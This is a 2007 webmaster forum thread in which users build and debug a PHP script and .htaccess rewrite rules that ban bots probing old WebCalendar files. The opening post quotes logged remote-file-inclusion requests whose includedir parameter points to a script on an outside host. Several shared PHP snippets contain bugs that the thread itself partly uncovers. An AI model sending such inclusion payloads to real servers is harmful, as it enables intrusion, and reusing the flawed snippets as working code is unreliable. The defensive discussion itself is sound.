Forum Moderators: coopster

Message Too Old, No Replies

bot trap avoidance?

<wbr string being used to avoid a php bot-trap?

         

revrob

12:02 pm on Sep 27, 2007 (gmt 0)

10+ Year Member



I have a bot trap script set up on my site and while checking its effectiveness saw the following entry in my site error log:
- the trap is set up in a redundant directory with fake files that I know certain "bad robots" are looking for as a result of a (now deleted) calendar being allowed by me to be crawled by google. What is left "looks" like a version of WebCalendar but in reality is just a series of bot-traps which are listed in robots.txt.

[Thu Sep 27 12:19:07 2007] [error] [client 202.57.69.xx] File does not exist: /var/www/vhosts/mydomain/httpdocs/WebCalendar/<wbr
[Thu Sep 27 12:19:10 2007] [error] [client 202.57.69.xx] File does not exist: /var/www/vhosts/mydomain/httpdocs/ws
[Thu Sep 27 12:19:12 2007] [error] [client 202.57.69.xx] File does not exist: /var/www/vhosts/mydomain/httpdocs/WebCalendar/<wbr
[Thu Sep 27 12:19:29 2007] [error] [client 202.57.69.xx] File does not exist: /var/www/vhosts/mydomain/httpdocs/WebCalendar/<wbr

In the access files for the same period and the same IP I find the equivalent entries which are a clearly recognisable hack attempt aimed at my bot-trap files, but not getting caught by them.

202.57.69.xx - - [27/Sep/2007:12:19:07 +0100] "GET /WebCalendar/%3Cwbr%20/%3Eview_entry.php?id=25&amp;date=20070703//ws/get_events.php?includedir=http://teamwork.example.net/id.txt? HTTP/1.1" 404 8752 "-" "libwww-perl/5.76"
202.57.69.xx - - [27/Sep/2007:12:19:10 +0100] "GET //ws/get_events.php?includedir=http://teamwork.example.net/id.txt? HTTP/1.1" 404 8752 "-" "libwww-perl/5.76"
202.57.69.xx - - [27/Sep/2007:12:19:12 +0100] "GET /WebCalendar/%3Cwbr%20//ws/get_events.php?includedir=http://teamwork.example.net/id.txt? HTTP/1.1" 404 8752 "-" "libwww-perl/5.76"
202.57.69.xx - - [27/Sep/2007:12:19:29 +0100] "GET /WebCalendar/%3Cwbr%20/%3Eview_entry.php?id=29&amp;date=20070719//ws/get_events.php?includedir=http://teamwork.example.net/id.txt? HTTP/1.1" 404 8752 "-" "libwww-perl/5.76"

The files this bot was accessing according to the access file, were my bot-traps (view_entry.php, get_events.php) yet they didn't get sprung and the bot's IP did not get added to my .htaccess file. I know the traps are working because they trap ME if I go to them.

I suspect that it has something to do with that "<wbr" string in the error file entry, and the equivalent "%3Cwbr%20" string in the access file entry.

I've added this Philippines based IP address to my ban list anyway but was curious as to how they avoided the trap?
Thanks in advance.

[edited by: jatar_k at 12:15 pm (utc) on Sep. 27, 2007]
[edit reason] examplified and no specific ips thanks [/edit]

PHP_Chimp

12:14 pm on Sep 27, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



I think that you may need to post the code for the trap so that we can see what you trap is looking for.

However there is another solution -
If this webcalendar is in an area that humans are very unlikely to get to then why not just ban anyone looking at that area?
I have a bot trap on most of my sites and they are accessed by a 1x1 clear pixel with no alt attribute and the directory is disallowed in my robots.txt. Just in case a person actually gets to the page the first page of the bot trap is a warning telling people to go back and not click on any of the links. If they choose to use any of the links then they are added to my blocked list.
That would save any bothering to filter the urls to check if they are allowed or not...just ban them all >:)

revrob

12:27 pm on Sep 27, 2007 (gmt 0)

10+ Year Member



thanks for the reply. Actually this is already how the trap works - in the areas where humans don't go, then anyone who does arrive and accesses any file, will get added to .htaccess.

And I do have some links to some of the traps that humans won't use as you describe.

But these particular ones are not accessed by crawling, but by "direct" visits, from bots who already know about them. My query is how this particular visit managed to get to the files without springing the trap.

Basically the fake php file calls a trap script (in the same directory) which writes the IP to .htaccess.

Here is the relevant section of the trap - names changed.
**********************************

<?php
include 'trap-script.php';
?>
************************************

and here is the relevant section of script
************************************
<?php
// author: seven-3-five, 2006-09-04, seven-3-five.blogspot.com
//this script is the meat and potatoes of the bot-trap
// 1. It sends you an email when the page /badbots.php is visited.
//The email contains various info about the visitor.
//2. It adds the directive
//'deny from $ip' ($ip being the visitor's ip address)
//to the bottom of your .htaccess file.

// SERVER VARIABLES USED TO IDENTIFY THE OFFENDING BOT

$ip = $_SERVER['REMOTE_ADDR'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$request = $_SERVER['REQUEST_URI'];
$referer = $_SERVER['HTTP_REFERER'];


// ADD 'deny from $ip' TO THE BOTTOM OF YOUR MAIN .htaccess FILE

$text = 'deny from ' . $ip . "\n";
$file = '/var/www/vhosts/example.org.uk/httpdocs/.htaccess';

add_badbot($text, $file);

// Function add_bad_bot($text, $file_name): appends $text to $file_name
// make sure PHP has permission to write to $file_name

function add_badbot($text, $file_name) {
$handle = fopen($file_name, 'a');
fwrite($handle, $text);
fclose($handle);
}
****************************************

Tne bad guy in question was definitely aiming for those files. But he didn't get sprung. If I go for those files, the trap works - and it works for plenty of other visitors. This is the first time I have seen that <wbr string in the logs. It generates a File does not exist message in the error log, but the access log shows it actually looking for a specific trap file. Maybe its just a badly programmed bot that never actually located the trap - I'm new to this stuff which is why I posted the actual log entries.

Thanks.

[edited by: eelixduppy at 12:48 pm (utc) on Sep. 27, 2007]
[edit reason] exemplified [/edit]

PHP_Chimp

12:49 pm on Sep 27, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



Are your error logs actually showing the ip address of the attacked with xx at the end? Or were you just being nice and not disclosing there ip address :)
Ahh no iv just looked again and seen its been sanitised lol

Also was that the complete set of the code for the bot trap? As there seems to be a bit missing. As if you are clocking everyone that calls the script then it doesnt matter if they have a refering page or not.

btw -
the <wbr> is a word break tag. Not often used but it allows browsers to put in word breaks in very long words. Most useful for tables where is you have content that is very long you can allow the browser to break up that word i.e. getElementByTagName in a <th> then most of the <td>'s are going to have very short content so you could break the header by putting getElement<wbr>ByTagName.

I have seen it used to confuse other browsers/scripts but not seen it used that way in php. Usually when people are trying to inject some code into something that shouldnt accept it...like IE with its numerous XSS exploits.
I am going to experiment with it and will report back if I manage to do anything interesting. However as php doesnt parse the (x)html it shouldnt take any notice of those tags.

[edited by: PHP_Chimp at 12:59 pm (utc) on Sep. 27, 2007]

revrob

1:36 pm on Sep 27, 2007 (gmt 0)

10+ Year Member



the IPs were there in the text I pasted, I think the board software sanitised them, not me. Just add a final .130 to that IP.

the script exerpts were just that - exerpts. the files as a whole do work - but I just posted the relevant bits to save on length! If you want the whole files that's fine. I didn't get my notifying "a bad bot has just been banned" email nor did the IP get added to .htaccess.

Everyone that hits that trap file gets automatically onto my .htaccess - because no humans or good bots should get there.

Have fun. Note that the string in the file is <wbr and not <wbr> - I did the google on <wbr> and saw what it was meant to be.

Thanks

PHP_Chimp

1:37 pm on Sep 27, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



I am still a little confused about why you are including the code in each page that you want to block (must need more coffee).

So here is a quick and dirty version of what im using -


<?php
function userIP(){
switch ($_SERVER){
case 'HTTP_CLIENT_IP':
$userip = $_SERVER['HTTP_CLIENT_IP'];
break;
case 'HTTP_X_FORWARDED_FOR':
$userip = $_SERVER['HTTP_X_FORWARDED_FOR'];
break;
case 'HTTP_X_FORWARDED':
$userip = $_SERVER['HTTP_X_FORWARDED'];
break;
case 'HTTP_FORWARDED_FOR':
$userip = $_SERVER['HTTP_FORWARDED_FOR'];
break;
case 'HTTP_FORWARDED':
$userip = $_SERVER['HTTP_FORWARDED'];
break;
default:
$userip = $_SERVER['REMOTE_ADDR'];
break;
}
return $userip;
}


function tel_me(){
$day = date("Y-m-d-(D)-H:i:s",time());
$from = "badbot-watch@example.com\r\n";
$to = "chimp@example.com";
$subject = "Alert: bad robot";
$msg = "A bad bot hit ". $_SERVER['REQUEST_URI'] ."\nat ". $day . " \n";
$msg .= "address is " . $bot_ip . "\nagent is " . $_SERVER['HTTP_USER_AGENT'] . "\n";
$msg = wordwrap($msg, 70);
mail($to, $subject, $msg, "From: $from");
}


function block_bot($t, $f){
$fh = fopen($f, 'ab');// open in binary mode just in case
fwrite($fh, $t);
fclose($fh);
}


$bot_ip = userIP();
// block the bot
$txt = "deny from $bot_ip\n";
$file = '/path/to/your/htaccess';
block_bot($txt, $file);
tel_me();


?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>That was a silly thing to do!</title>
</head>


<body>
<h1>Congratulations</h1>
<p>You have succeeded in getting your self blocked from this site.<br />
You were warned about coming here. Have a nice life.</p>
<p>Bye</p>


</body>
</html>

call this get_lost.php and put it in the directory you are using as the bot trap.
If you know that they are looking for specific pages then you can redirect all of those requests through this script in .htaccess.

Assuming your /WebCalendar/ is the nonhuman accessible directory then if you use the following in your htaccess


RewriteCond %{REQUEST_URI} ^WebCalendar/
RewriteCond %{REQUEST_URI}!^WebCalendar/get_lost.php$
RewriteCond %{REQUEST_URI}!^WebCalendar/your_last_warning.php$
# should rewrite everything starting with WebCalendar/
# except the get_lost.php page and your_last_warning
RewriteRule ^(.*)$ /WebCalendar/get_lost.php [L]
# should send everything through this script.

get_lost.php will block them
your_last_warning.php is the page where you can tell them not to click any other links. It is the only safe page in the directory.

Please test this first, as I have just written this out of my head so there may well be some problems with it. If there are then come back and im sure I or someone else can sort it.

[edited by: PHP_Chimp at 1:41 pm (utc) on Sep. 27, 2007]

PHP_Chimp

1:45 pm on Sep 27, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



Ahh yes incomplete tags ;)
XSS exploits often use them as browsers are a little stupid (not naming IE as a good example of a very stupid browser...oops did I name one)
Its amazing what <img will let you get away with...

However I dont think that it will make any difference to php as it doesnt parse the (x)html tags.

[edited by: PHP_Chimp at 1:45 pm (utc) on Sep. 27, 2007]

revrob

2:29 pm on Sep 27, 2007 (gmt 0)

10+ Year Member



I'm doing it that way because I'm a newbie and I hadn't got as far as the sort of script you're using ;-( - I just spotted the files some of the bots were after and as I wasn't using the genuine versions of those files in that location, I just copied my current trap into that location with those file names as bait.

I first discovered traps about a fortnight ago, along with .htaccess. So its all been uphill since there. I like the look of that script - I've copied it and will try it out. I'll be back (but not for a while - need more coffee myself!)

As for php - only discovered that when I started installing things like calendars but I don't understand a word of it - just good at cutting and pasting and following instructions. (like a computer!)

Still don't know why I didn't catch that Filipino bot in my net though!

Final question before I go off and try all this out. Can a site sub-directory be given its own .htaccess file and used as a test bed for this sort of stuff?

PHP_Chimp

2:36 pm on Sep 27, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



Yes, htaccess-es effect all directories above them. So it would be unwise to test anything new on your root level of htaccess.
If there is a problem with it then you may well get a 500 error. You will probably get a page saying there is an error with the server and to contact the admin of the server. If that happens then you can try commenting out the lines in the file and keep uploading it again till it works. Comments in htaccess are single line and start with #.

If you have problems with the htaccess there is an apache forum here, they will sort it all out for you. Or come back but this is php, so you may well get a faster (maybe better) answer from the apache forum.

Good luck.

revrob

4:47 pm on Sep 27, 2007 (gmt 0)

10+ Year Member



Okay - I have now done:
Created get_lost.php and your_last_warning.php and put them in the /trap/ directory edited as neccessary for my email and htaccess path.

Your last warning.php contains a 1x1 transparent gif image link to the get_lost.php as does my main root index.html file.

robots.txt already had the /trap/ directory so no changes needed there. Search engines know not to go there.

I put the .htaccess fragment in place

I am assuming I do not have to actually put the traps into /WebCalendar/ merely rely on the .htaccess fragment to redirect requests for any files in that directory (including ones that aren't there?) to the /trap/your_last_warning.php?

The htaccess fragment you gave me is denying me access to my site and throwing up a server configuration error.
The line that kills the site is
RewriteRule ^(.*)$ /WebCalendar/get_lost.php [L]

What does that line actually do?

If I remark out that line then I get access again. But I can't figure out the .htaccess combination that both allows my site to work, and will fire the trap if I go looking for a non-existent file in the /WebCalendar directory.

I'm getting error messages about max redirect limits being exceeded.

The actual trap works - if I click on the script it does what it says on the tin.

I'll shoot over to the .htaccess department!

PHP_Chimp

4:58 pm on Sep 27, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



Try changing it to

RewriteCond %{REQUEST_URI} ^WebCalendar/
RewriteCond %{REQUEST_URI}!^WebCalendar/your_last_warning.php$
# should rewrite everything starting with WebCalendar/
# except the your_last_warning
RewriteRule ^(.*)$ /WebCalendar/get_lost.php [L]
# should send everything through this script.

The rewriteCond is a condition for the rewriteRule to apply to.
So the RewriteRule in this case is asking for everything (.*) any single character . as many times as you like * to be sent through to the /WebCalendar/get_lost.php page.

If the actual script get_lost.php is in a diffrent location then you will need to change the /WebCalendar/get_lost.php [L] to point to the correct location. The [L] just makes sure that this is the last rule applied, so stops the server continuing on when you want the request sent to the bot trap.

PHP_Chimp

5:02 pm on Sep 27, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



I stick my link to that script on every page.
There is the 1x1 image there. So it means that if a bot hits any page it gets the chance to get itself blocked.
Then the 1x1 image links through to your_last_warning.php. On that page there is a link that says DONT CLICK THIS. If they click then they actually go to a page with 40000 made up email addresses in the hope that an email harvester will collect a load of random rubbish...and get banned :)

revrob

5:43 pm on Sep 27, 2007 (gmt 0)

10+ Year Member



RewriteCond %{REQUEST_URI} ^WebCalendar/
# RewriteCond %{REQUEST_URI}!^trap/your_last_warning.php$
# should rewrite everything starting with WebCalendar/
# except the your_last_warning
RewriteRule ^(.*)$ /trap/get_lost.php [L]
# should send everything through this script.

doesn't crash the site (but doesn't do the job of course)

RewriteCond %{REQUEST_URI} ^WebCalendar/
RewriteCond %{REQUEST_URI}!^trap/your_last_warning.php$
# should rewrite everything starting with WebCalendar/
# except the your_last_warning
RewriteRule ^(.*)$ /trap/get_lost.php [L]
# should send everything through this script.

DOES crash the site and gives me the error message

[Thu Sep 27 18:30:25 2007] [alert] [client my IP] /var/www/vhosts/mydomain/httpdocs/.htaccess: RewriteCond: bad argument line '%{REQUEST_URI}!^trap/your_last_warning.php$'

Here is a visitor who was hacking away while I was testing
[Thu Sep 27 18:30:25 2007] [alert] [client 222.122.43.xx] /var/www/vhosts/mydomain/httpdocs/.htaccess: RewriteCond: bad argument line '%{REQUEST_URI}!^trap/your_last_warning.php$', referer: http://example.com/profile.php?mode=register&sid=22568d8c267ef528daf7bae8c890f9a5
[Thu Sep 27 18:30:29 2007] [alert] [client 222.122.43.xx] /var/www/vhosts/mydomain/httpdocs/.htaccess: RewriteCond: bad argument line '%{REQUEST_URI}!^trap/your_last_warning.php$', referer: http://example.com/posting.php?mode=newtopic&f=7&sid=a52cca456ae9a3ca49174beea8c37027
[Thu Sep 27 18:30:30 2007] [alert] [client 222.122.43.xx] /var/www/vhosts/mydomain/httpdocs/.htaccess: RewriteCond: bad argument line '%{REQUEST_URI}!^trap/your_last_warning.php$', referer: http://example.com/posting.php?mode=newtopic&f=7&sid=a52cca456ae9a3ca49174beea8c37027
[Thu Sep 27 18:30:32 2007] [alert] [client 222.122.43.xx] /var/www/vhosts/mydomain/httpdocs/.htaccess: RewriteCond: bad argument line '%{REQUEST_URI}!^trap/your_last_warning.php$', referer: http://example.com/viewforum.php?f=7&sid=a52cca456ae9a3ca49174beea8c37027
[Thu Sep 27 18:30:34 2007] [alert] [client 222.122.43.xx] /var/www/vhosts/mydomain/httpdocs/.htaccess: RewriteCond: bad argument line '%{REQUEST_URI}!^trap/your_last_warning.php$', referer: http://example.com/phpBB//index.php?sid=a52cca456ae9a3ca49174beea8c37027
[Thu Sep 27 18:30:38 2007] [alert] [client 222.122.43.xx] /var/www/vhosts/mydomain/httpdocs/.htaccess: RewriteCond: bad argument line '%{REQUEST_URI}!^trap/your_last_warning.php$', referer: http://example.com/index.php?sid=a52cca456ae9a3ca49174beea8c37027

Grateful for the help. I've also asked in the .htaccess forum.

[edited by: jatar_k at 7:55 pm (utc) on Sep. 27, 2007]
[edit reason] please use exampe.com and remove ips [/edit]

PHP_Chimp

7:51 pm on Sep 27, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



RewriteCond %{REQUEST_URI}!^trap/your_last_warning.php$

There needs to be a space (or more, so you can use tab to line things up if you want) between the %{REQUEST_URI} and the!^

Let me know if that helps

edit -
It doesnt seem to be letting that line of code display with a space in there. Just add the space to see if that sorts it.

[edited by: PHP_Chimp at 7:53 pm (utc) on Sep. 27, 2007]

revrob

8:34 pm on Sep 27, 2007 (gmt 0)

10+ Year Member



OK - that extra space stops the thing crashing. But now it doesn't seem to actually do what it is supposed to.

I've got the files in place. /trap/ has both files and they work.

If I then browse to mydomain/WebCalendar/garbage.anythingyoulike
I get my error document because the file doesn't exist, but I don't get banned and it doesn't write my IP to .htaccess

I don't get a bad bot email either.

If I go straight to the /trap/get_lost.php page manually, in the trap folder it does work - I get banned, and my customised 403 page displays.

So - the redirection isn't working but the trap is.

Here is what I have in .htaccess at the moment

Rewriteengine ON
RewriteRule ^$ /index.html [R,NC,L]

RewriteCond %{REQUEST_URI} ^WebCalendar/
RewriteCond %{REQUEST_URI}!^trap/your_last_warning.php$
RewriteCond %{REQUEST_URI}!^trap/get_lost.php$
# should rewrite everything starting with WebCalendar/
# except the your_last_warning
RewriteRule ^(.*)$ /trap/get_lost.php [L]
# should send everything through this script.

ErrorDocument 403 /403.htm
ErrorDocument 404 /404.htm
ErrorDocument 500 /500.htm
<Files .htaccess>
order allow,deny
deny from all
</Files>

<FilesMatch "\.php$">
order allow,deny
allow from all
# </FilesMatch>

ErrorDocument 403 /403.htm
ErrorDocument 404 /404.htm
ErrorDocument 500 /500.htm

#<Files .htaccess>
#order allow,deny
#deny from all
#</Files>

#order allow,deny
deny from # long list
#allow from all

</FilesMatch>

Error messages include:

[Thu Sep 27 21:09:36 2007] [error] [client ***.142.249.9] File does not exist: /var/www/vhosts/mydomain/httpdocs/WebCalendar/rubish
[Thu Sep 27 21:09:39 2007] [error] [client ***.142.249.9] File does not exist: /var/www/vhosts/mydomain/httpdocs/WebCalendar/rubish
[Thu Sep 27 21:09:47 2007] [error] [client ***.142.249.9] Directory index forbidden by rule: /var/www/vhosts/mydomain/httpdocs/WebCalendar/

Thanks for sticking with this!

revrob

8:55 am on Sep 28, 2007 (gmt 0)

10+ Year Member



Okay - the guys on the Apache forum got this finally sorted. Thanks for your tremendous help also and for the script. Here's what I ended up with.

The fragment is now:

Rewriteengine ON
RewriteRule ^$ /index.html [R,NC,L]

#
RewriteCond %{REQUEST_URI}!/trap/your_last_warning\.php$
RewriteCond %{REQUEST_URI}!^/trap/get_lost\.php$
# should rewrite everything starting with WebCalendar/ except the warning.php
RewriteRule ^WebCalendar/ /trap/get_lost.php [L]
# should send everything through this script.

ErrorDocument 403 /403.htm
ErrorDocument 404 /404.htm
ErrorDocument 500 /500.htm
<Files .htaccess>
order allow,deny
deny from all
</Files>

<FilesMatch "\.php$">
order allow,deny
allow from all

ErrorDocument 403 /403.htm
ErrorDocument 404 /404.htm
ErrorDocument 500 /500.htm

deny from # list of IPs

</FilesMatch>
*************************end of .htaccess

The folder being redirected is /WebCalendar/
The warning file is /trap/your_last_warning.php
The trap script is /trap/get_lost.php

The result is that a request for something like
"/WebCalendar/anyoldrubbish.whateverfiletype" now fires off the trap, sends me an email, writes the IP to .htaccess and denies access, while displaying a message for an innocent inheritor of a blocked IP to contact the webmaster.
On further attempts to access the site home page they get my customised error page which also has contact details.

All I then need to do is check .htaccess every now and then to put the added IP's into the "alphabetically sorted" list and check for any oft-repeated ranges that I can lump together into a banned range rather than just individual ones.

This is exactly what I wanted. Thanks to those both here and in the php forum for helping me get it right! That will keep the bots chasing old WebCalendar vulnerabilities off my site for a short while!

I am very grateful.

I have a similar emailing script that puts the banned IP into the email so I may try and work that into your emailing script. If I do I'll come back and report. Many many thanks.

revrob

2:35 pm on Sep 28, 2007 (gmt 0)

10+ Year Member



One remaining minor issue with the bot trap (which is working fine now)

The email the script sends is not delivering the IP address of the intruding bot. My error logs give the following - which seems to indicate the problem:

PHP Notice: Undefined variable: bot_ip in /var/www/vhosts/mydomain/httpdocs/trap/get_lost.php on line 33

line 33 of the script reads:
msg .= "address is " . $bot_ip . "\nagent is " . $_SERVER['HTTP_USER_AGENT'] . "\n";

the resulting bad bot email reads: (there is a blank after "address is" instead of the IP)
************************************
A bad bot hit /WebCalendar/any.file
at 2007-09-28-(Fri)-15:14:40
address is
agent is Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.7)
Gecko/20070914 Firefox/2.0.0.7
*************************************

the get_lost script is here: the "$bot_ip" string seems to work when applied to writing to .htaccess but doesn't seem to return a result when writing the email

*********************************
<?php
function userIP(){
switch ($_SERVER){
case 'HTTP_CLIENT_IP':
$userip = $_SERVER['HTTP_CLIENT_IP'];
break;
case 'HTTP_X_FORWARDED_FOR':
$userip = $_SERVER['HTTP_X_FORWARDED_FOR'];
break;
case 'HTTP_X_FORWARDED':
$userip = $_SERVER['HTTP_X_FORWARDED'];
break;
case 'HTTP_FORWARDED_FOR':
$userip = $_SERVER['HTTP_FORWARDED_FOR'];
break;
case 'HTTP_FORWARDED':
$userip = $_SERVER['HTTP_FORWARDED'];
break;
default:
$userip = $_SERVER['REMOTE_ADDR'];
break;
}
return $userip;
}

function tel_me(){
$day = date("Y-m-d-(D)-H:i:s",time());
$from = "badbots@mydomain\r\n"; //edit for the right email address
$to = "badbots@mydomain"; //edit for the right email address
$subject = "Alert: bad robot";
$msg = "A bad bot hit ". $_SERVER['REQUEST_URI'] ."\nat ". $day . " \n";
msg .= "address is " . $bot_ip . "\nagent is " . $_SERVER['HTTP_USER_AGENT'] . "\n";
$msg = wordwrap($msg, 70);
mail($to, $subject, $msg, "From: $from");
}

function block_bot($t, $f){
$fh = fopen($f, 'ab');// open in binary mode just in case
fwrite($fh, $t);
fclose($fh);
}

$bot_ip = userIP();
// block the bot
$txt = "deny from $bot_ip\n";
$file = '/var/www/vhosts/mydomain/httpdocs/.htaccess'; //edit for path to your htaccess file
block_bot($txt, $file);
tel_me();

?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<title>That was a silly thing to do!</title>
</head>

<body>
<h1>Congratulations</h1>
<p>You have succeeded in getting your self blocked from this site.<br />
You were warned about coming here. Have a nice life.</p>
<p>Bye</p>

</body>
</html>
****************************************

Any ideas why the IP isn't getting into the email?
Many thanks.

revrob

5:10 pm on Sep 28, 2007 (gmt 0)

10+ Year Member



For anyone interested, the discussion about my trap which relates to the the .htaccess code is in this thread here
[webmasterworld.com...]

revrob

3:31 pm on Sep 29, 2007 (gmt 0)

10+ Year Member



Can anyone please help me get this script to put it's "deny from IP" message INSIDE the .htaccess <FilesMatch> container rather than outside (where it behaves a bit erratically in my setup)

All suggestions gratefully received!

SCRIPTcalled get_lost.php - it is accompanied by a warning page called your_last_warning.php (see .htaccess file )

<?php
function userIP(){
switch ($_SERVER){
case 'HTTP_CLIENT_IP':
$userip = $_SERVER['HTTP_CLIENT_IP'];
break;
case 'HTTP_X_FORWARDED_FOR':
$userip = $_SERVER['HTTP_X_FORWARDED_FOR'];
break;
case 'HTTP_X_FORWARDED':
$userip = $_SERVER['HTTP_X_FORWARDED'];
break;
case 'HTTP_FORWARDED_FOR':
$userip = $_SERVER['HTTP_FORWARDED_FOR'];
break;
case 'HTTP_FORWARDED':
$userip = $_SERVER['HTTP_FORWARDED'];
break;
default:
$userip = $_SERVER['REMOTE_ADDR'];
break;
}
return $userip;
}

function tel_me(){
$day = date("Y-m-d-(D)-H:i:s",time());
$from = "badbots@mydomain\r\n"; //edit for the right email address
$to = "badbots@mydomain"; //edit for the right email address
$subject = "Alert: bad robot";
$msg = "A bad bot hit ". $_SERVER['REQUEST_URI'] ."\nat ". $day . " \n";
$msg .= "address is " . $bot_ip . "\nagent is " . $_SERVER['HTTP_USER_AGENT'] . "\n";
$msg = wordwrap($msg, 70);
mail($to, $subject, $msg, "From: $from");
}

function block_bot($t, $f){
$fh = fopen($f, 'ab');// open in binary mode just in case
fwrite($fh, $t);
fclose($fh);
}

$bot_ip = userIP();
// block the bot
$txt = "deny from $bot_ip\n";
$file = '/var/www/vhosts/mydomain/httpdocs/.htaccess'; //edit for path to your htaccess file
block_bot($txt, $file);
tel_me();

?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>That was a silly thing to do!</title>
</head>

<body>
<h1>Congratulations</h1>
<p>You have succeeded in getting your self blocked from this site.<br />
You were warned about coming here. Have a nice life.</p>
<p> If you have no idea why you have been banned then it may be that you have inherited an IP (Internet Protocol) address from someone who previously used it to try and hack our site. In which case please feel free to email our webmaster and give him your present IP address and ask for it to be unbanned. Sorry for the inconvenience! If you don't know what your IP address is right now, then open another browser window or tab and go to [whatismyip.com...] and it will be displayed on the screen. Then copy and paste it into an email to webmaster AT mydomain and we'll look into it.
<p>Bye</p>

</body>
</html>

.htaccess file (I've added an indicator of where there is a space in one of the statements, this board seems to remove them!

Rewriteengine ON
RewriteRule ^$ /index.html [R,NC,L]
#
RewriteCond %{REQUEST_URI}*spacehere*!/trap/your_last_warning\.php$
RewriteCond %{REQUEST_URI}*spacehere*!/trap/get_lost\.php$
RewriteCond %{REQUEST_URI}*spacehere*!^/trap/get_lost\.php$
# should rewrite everything starting with WebCalendar/ except the warning.php
RewriteRule ^WebCalendar/ /trap/get_lost.php [L]
# should send everything through this script.

ErrorDocument 403 /403.htm
ErrorDocument 404 /404.htm
ErrorDocument 500 /500.htm
<Files .htaccess>
order allow,deny
deny from all
</Files>

<FilesMatch "\.php$">
order allow,deny
allow from all

ErrorDocument 403 /403.htm
ErrorDocument 404 /404.htm
ErrorDocument 500 /500.htm

deny from # list of IPs
</FilesMatch>

PHP_Chimp

7:40 pm on Oct 1, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



The problem is if you require the ending </filematch> then it makes it difficult to write the code to the end of the file. For my personal use I get the email then choose how I am going to block the bot. Some of the bots will have user agent strings that will be easy to block and it stops your htaccess file having 1000's of lines that all come from the same host i.e. on one of my sites I block the entire 38.#*$!x block as I had so many problems with people/bots from that area.

However below is a bit of modified code that will write what you want direct into your htaccess.

change $t = "\ndeny from $bot_ip\n</FilesMatch>";


function block_bot($t, $f){
$size = filesize($f);
$s = $size-14; // </filesMatch> == 14 bytes
$fh = fopen($f, 'r+b'); // open in binary mode just in case
fseek($fh, $s)
fwrite($fh, $t);
fclose($fh);
}

Although this works you may want to think about manually blocking people as a lot of ip's are dynamic so if you block one they will renew there connection, get another address and get blocked. Each time you add another line of text to the htaccess file it gets larger and as the server reads this file before anything else is processed if you have a 20k htaccess file you have effectively added 20k to every request that you make on the server so it will be a lot slower. Blocking by user agent can be very effective, block by IP when there is no other solution.
I guess that I should have pointed that out at the beginning, but I wasn't concentrating on the end result...just fixing the script...will try harder next time ;)

revrob

9:23 pm on Oct 1, 2007 (gmt 0)

10+ Year Member



Thanks. I'll digest that slowly!
I understand about the long IP list and I am turning them into ranges when they are from countries I am not really that worried about in terms of my site traffic - It's primarily a local site for my neighbourhood - a church site with a Bulgarian link.

I also wondered about letting the IP list grow chronologically from the bottom, putting any "ranges" at the bottom, and then taking off the top half every now and again - like once a week or fortnight depending on traffic. If it's a regular bot it will ban itself next time it visits - if it is very irregular it's a waste having the IP, if it's moved on then the IP might as well be unblocked anyway.

Thanks again for the input.